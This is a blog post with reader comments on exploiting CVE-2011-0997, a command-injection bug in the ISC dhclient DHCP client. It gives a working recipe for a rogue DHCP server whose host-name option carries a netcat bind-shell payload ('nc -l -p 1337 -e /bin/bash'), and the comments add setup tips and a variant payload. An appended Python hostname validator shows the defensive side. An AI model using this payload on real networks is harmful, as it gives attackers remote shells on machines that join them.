Fun with CVE-2011-0997

Saw a killer DHCP client bug come across the wire the other day and thought it would be fun to play around with. Here's some info on it:
dhclient in ISC DHCP 3.0.x through 4.2.x before 4.2.1-P1, 3.1-ESV before 3.1-ESV-R1, and 4.1-ESV before 4.1-ESV-R2 allows remote attackers to execute arbitrary commands via shell metacharacters in a hostname obtained from a DHCP message.
source: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0997

This is super easy to exploit: all you need to do is set up a DHCP server and edit the client's hostname to include our payload! Once you get DHCP up and running, edit your /etc/dhcp3/dhcpd.conf and locate the line that looks something like this:
subnet 10.10.5.0 netmask 255.255.255.0 {
Then right under it add something like this:
option host-name "test;nc -l -p 1337 -e /bin/bash";
Now, using the above payload, when someone requests an IP from you and it's accepted, a shell will open on port 1337 on their machine 😀

What happens is the victim's computer gets the hostname value from DHCP, then just runs it against the shell. Because we added the shell metacharacter ";", we are telling the shell that it has multiple commands to execute, which in the above case are the command to change the hostname to "test" and "nc -l -p 1337 -e /bin/bash". Fun right? Ok that's it, peace.
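As an added example, not code from the original post: the defensive check a hardened DHCP client applies is to validate the offered host-name against hostname syntax before handing it to any shell. This Python parses the DHCP options field (constructed sample bytes, including the exact host-name payload from the post) and returns the name only when it is well-formed; option codes and the regex are mine, not taken from dhclient.

```python
import re

# DHCP option codes (RFC 2132): host-name is option 12, options are TLV
# encoded as <code><length><value>, terminated by END and padded with PAD.
HOST_NAME_OPTION, PAD_OPTION, END_OPTION = 12, 0, 255

# RFC 952/1123 hostname syntax: dot-separated labels of letters, digits and
# hyphens, each starting and ending with a letter or digit. A ';' or space
# never matches, so the payload from the post is rejected before any shell sees it.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")

def parse_options(options: bytes) -> dict:
    """Walk the TLV options field until END; returns {code: raw value}."""
    out, i = {}, 0
    while i < len(options) and options[i] != END_OPTION:
        if options[i] == PAD_OPTION:
            i += 1
            continue
        if i + 1 >= len(options):
            raise ValueError("truncated option header")
        code, length = options[i], options[i + 1]
        value = options[i + 2 : i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        out[code] = value
        i += 2 + length
    return out

def safe_host_name(options: bytes):
    """Return the offered host-name only if it is a valid hostname, else None."""
    raw = parse_options(options).get(HOST_NAME_OPTION)
    if raw is None:
        return None
    try:
        name = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    # fullmatch (not match with $) so a trailing newline cannot slip through.
    if len(name) > 253 or not _HOSTNAME_RE.fullmatch(name):
        return None
    return name

# Constructed samples: a benign DHCPOFFER options field (message-type 2 plus
# host-name "test") and one carrying the exact host-name from the post.
BENIGN = bytes([53, 1, 2, 12, 4]) + b"test" + bytes([255])
MALICIOUS_NAME = b"test;nc -l -p 1337 -e /bin/bash"
MALICIOUS = bytes([53, 1, 2, 12, len(MALICIOUS_NAME)]) + MALICIOUS_NAME + bytes([255])
```

A client that only exports names passing safe_host_name() to its hook script would set "test" from the benign offer and ignore the host-name from the malicious one entirely.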


9 Responses to Fun with CVE-2011-0997

  1. usr says:

    This trick works only when a client does not have a hostname entry.

    btw. what distro did you test?

    • AnarchyAngel says:

      Oh crap, good catch on that. Thank you. Yes, the victim has to be set up to get its hostname from DHCP, and I tested it on Ubuntu.

  2. inode says:

    In what version of Ubuntu did you try it?

    I'm working on an unpatched 10.10 but the trick isn't working; can you give me more information?

    Best regards,

    inode

  3. nima says:

    how to set up dhclient to obtain the hostname from the DHCP server and set it as the hostname?

    • AnarchyAngel says:

      add host-name to the list of requests in /etc/dhcp3/dhclient.conf

      • nima says:

        tnx 🙂 now it works and gets host-name! but ';' won't escape, my hostname becomes something like this!
        nima@clientname;nc -l -p 4444 -e /bin/bash$
        again tnx for your attention

  4. Max says:

    Bit late, I know, but would this trick be able to force open a port for SSH on the time capsule itself? That would be cool, if there was a way.
